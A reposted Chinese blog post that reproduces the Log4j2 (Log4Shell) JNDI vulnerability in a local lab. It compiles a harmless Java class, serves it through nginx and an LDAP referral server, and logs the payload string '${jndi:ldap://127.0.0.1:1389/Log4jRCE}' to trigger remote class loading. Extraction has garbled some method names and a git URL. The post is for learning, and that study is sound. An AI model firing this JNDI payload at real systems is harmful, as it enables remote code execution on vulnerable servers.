2023年6月25日发(作者:)
Log4j2漏洞复现Log4j2漏洞复现⼀、前⾔最近Log4j2的漏洞算是刷屏了。博主也就跟风学习了⼀下,虽不说开发能⼒有啥提升,但是也算是学了点知识吧。这次就分享⼀下Log4j2漏洞的复现场景,以供⼤家参考。⼆、参考⽂章本⽂的⽰例也都是按照这⾥⾯敲的,⽂章还有很多⼤佬评论⼤家可以多看看三、漏洞触发流程图这⾥使⽤LDAP服务进⾏演⽰解释:Web服务为受害者对象,LDAP和HTTP服务为攻击者对象。⼀句话概括:攻击者利⽤log4j2的JNDI技术发送恶意请求,使受害者获取⾃⼰的恶意字节码⽂件并执⾏。四、代码复现1. 书写⼀个恶意字节码⽂件并⽤Javac进⾏编译public class Log4jRCE { static { n("I am Log4jRCE from remote"); }}javac 获得这个字节码⽂件2. 启动nginx并把class⽂件放⼊nginx的html⽂件夹,可以通过ip:port/进⾏获取start nginx浏览器数据127.0.0.1:8000/可以获取该字节码⽂件3. 启动LDAP服务器,暴漏这个字节码⽂件git clone git@:bkfish/ Apache-Log4j-Learning/toolsjava -cp fServer "127.0.0.1:8000/#Log4jRCE"4. 模拟⼀个server执⾏()观察运⾏结果写⼀个ublic class RunApp { private static final Logger logger = ger(); public static void main(String[] args) { perty("RLCodebase", "true"); ("${jndi:ldap://127.0.0.1:1389/Log4jRCE}"); }}启动结果为会发现有⼀个“I am Log4jRCE from remote”就是远程class⽂件的逻辑
发布者:admin,转转请注明出处:http://www.yc00.com/web/1687692435a32166.html
评论列表(0条)